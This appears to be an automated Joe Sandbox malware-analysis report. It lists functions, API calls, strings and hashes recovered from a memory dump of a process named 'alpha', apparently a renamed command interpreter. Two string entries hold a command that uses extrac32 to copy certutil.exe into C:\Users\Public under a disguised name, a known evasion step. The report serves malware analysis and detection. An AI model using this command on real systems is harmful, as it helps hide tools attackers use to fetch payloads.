                                                                                            • Part of subcall function 00007FF6A0E80010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6A0E800A7
                                                                                            • Part of subcall function 00007FF6A0E80010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6A0E80181
                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E8D401
                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E8D41B
                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E8D435
                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E8D480
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                          • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                          • API String ID: 3964947564-518410914
                                                                                          • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                          • Instruction ID: af844d54baaf80bf6efb525ad1f19496aeafac29abced1fac8f7dcede3f32ddb
                                                                                          • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                          • Instruction Fuzzy Hash: 5C026931A0F643F6FA549B21E950278B7A1FF897A5F648135D91EC27A2DF3CA415E300
                                                                                          Function 00007FF6A0E802A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp$iswspacewcschr
                                                                                          • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                          • API String ID: 840959033-3627297882
                                                                                          • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                          • Instruction ID: 9633db1d19626e4e8b65e16510926acfdc952699339b0f592cc5a6b19004c3fc
                                                                                          • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                          • Instruction Fuzzy Hash: C0D18E71E0F643A6FB50AF61E8052B967A0FF84B45F548035DA4EC63A6DF3CE449A350
                                                                                          Function 00007FF6A0E8081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp$EnvironmentVariable
                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                          • API String ID: 198002717-267741548
                                                                                          • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                          • Instruction ID: c78d0d15625e80731e17bca26b3e1a511129ff6a7212e1e560c4dfcade4ff1ef
                                                                                          • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                          • Instruction Fuzzy Hash: 83517075A0E743A6F6549B21B810279ABA1FF8EB81F54A035D90EC3795DF3CE448E350
                                                                                          Function 00007FF6A0E7EF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F000
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F031
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F0D6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigitiswspacewcschr
                                                                                          • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                          • API String ID: 1595556998-2755026540
                                                                                          • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                          • Instruction ID: 6fac5bdaea5f666f300459ca93e8b35bbef114a2087111a5e141771f52a9c52f
                                                                                          • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                          • Instruction Fuzzy Hash: ED22CA75E0F693F1FA608B25A84427A66A0BF45791F908136DA9DC23E7DF3CE421B710
                                                                                          Function 00007FF6A0E7D3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                          • String ID: "$=,;
                                                                                          • API String ID: 3545743878-4143597401
                                                                                          • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                          • Instruction ID: 6262cb64aade58d12a0299e44f83260929dae7ccf1cc1e5f645a3222300ab161
                                                                                          • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                          • Instruction Fuzzy Hash: DFC1AD72E0E693A2EB695B1194003B9B6B1FF49F55F199036DE4EC3395EF3CA845E200
                                                                                          Function 00007FF6A0E95BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFormatMessageThread
                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                          • API String ID: 2411632146-3173542853
                                                                                          • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                          • Instruction ID: 18596935f4268320b9beef1e0f1717c81bfb67f3da4685b0e89397bf9f51f5f2
                                                                                          • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                          • Instruction Fuzzy Hash: 12616BB2E0A783E1EA64DF61A4045B9A3A0FF48BC4F54413AEE4D87758DF3DE641A700
                                                                                          Function 00007FF6A0E826E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile_open_osfhandle
                                                                                          • String ID: con
                                                                                          • API String ID: 2905481843-4257191772
                                                                                          • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                          • Instruction ID: a5cc2c68f7c4a0a354af6f3cb010ed8b2ca08e54f06bff4076ec8556f8bf9fa5
                                                                                          • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                          • Instruction Fuzzy Hash: 1371D732A09783AAE7608F25E440379BAA0FB8AB61F544235DE5E837D4DF3DD449DB00
                                                                                          Function 00007FF6A0E993E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                          • String ID:
                                                                                          • API String ID: 3829876242-3916222277
                                                                                          • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                          • Instruction ID: 922c2d36a5b40b99f133e9bab17b101a1703867f0a5d5c1b846cbc4793c4ff3b
                                                                                          • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                          • Instruction Fuzzy Hash: 09619E36A0A643A7EB159B25E40027EBBA1FFC9B95F458134DE0E87795DF3CE8059B00
                                                                                          Function 00007FF6A0EA1A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                          • String ID: CSVFS$NTFS$REFS
                                                                                          • API String ID: 3510147486-2605508654
                                                                                          • Opcode ID: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                          • Instruction ID: fc4b2b160720abcf1be9745864870076e2d65204565402049c1c2a1423b7bad6
                                                                                          • Opcode Fuzzy Hash: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                          • Instruction Fuzzy Hash: C461703270ABC29AEB658F21D8443E9B7B4FB49B86F544075DA0E8B758DF38D604D700
                                                                                          Function 00007FF6A0E772B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • longjmp.MSVCRT(?,00000000,00000000,00007FF6A0E77279,?,?,?,?,?,00007FF6A0E7BFA9), ref: 00007FF6A0E94485
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: longjmp
                                                                                          • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                          • API String ID: 1832741078-366822981
                                                                                          • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                          • Instruction ID: 46adebd2932164752c91021a6d51237f9f625cf8d54a58a4cf51552df28558fb
                                                                                          • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                          • Instruction Fuzzy Hash: F2C171B1F0E643B2E624DB565584AB867E1BB4ABC5FA14036DD0DD3792CF2CA446B380
                                                                                          Function 00007FF6A0E7B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • memset.MSVCRT ref: 00007FF6A0E7BA2B
                                                                                          • wcschr.MSVCRT ref: 00007FF6A0E7BA8A
                                                                                          • wcschr.MSVCRT ref: 00007FF6A0E7BAAA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heapwcschr$AllocProcessmemset
                                                                                          • String ID: -$:.\$=,;$=,;+/[] "
                                                                                          • API String ID: 2872855111-969133440
                                                                                          • Opcode ID: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                          • Instruction ID: 0c5c964d48b15df265e6e80df794b71225244cbdc0c6a0c6b7949b69ec4c697d
                                                                                          • Opcode Fuzzy Hash: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                          • Instruction Fuzzy Hash: 8CB19132A0EA83A1EA709B15A48437966A0FF89B80F954235DE5EC3795DF3CE845A300
                                                                                          Function 00007FF6A0E7FC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                          • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                          • API String ID: 1606811317-2340392073
                                                                                          • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                          • Instruction ID: 5c8d1bc77561c43ea53cf63bca57bcdfea16dccb85cb9d0fa7f74e860e2573b9
                                                                                          • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                          • Instruction Fuzzy Hash: 7CD1BF31E0AB43A2EB518B24A8442B977A0FF857A0F948132DE5D977E6DF3CE415E700
                                                                                          Function 00007FF6A0EA03AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$ErrorLast$InformationVolume
                                                                                          • String ID: %04X-%04X$~
                                                                                          • API String ID: 2748242238-2468825380
                                                                                          • Opcode ID: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                          • Instruction ID: 008b9d5dce13b29e5005fd27a069eb49598c20a82f861780ef87f6ed9a3e74c1
                                                                                          • Opcode Fuzzy Hash: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                          • Instruction Fuzzy Hash: E1A1AF32709BC2AAEB658F2198502E977A1FB89789F508035DA4D8BB89DF3CD645D700
                                                                                          Function 00007FF6A0E8662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E86677
                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E8668F
                                                                                          • _errno.MSVCRT ref: 00007FF6A0E866A3
                                                                                          • wcstol.MSVCRT ref: 00007FF6A0E866C4
                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E866E4
                                                                                          • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E866FE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
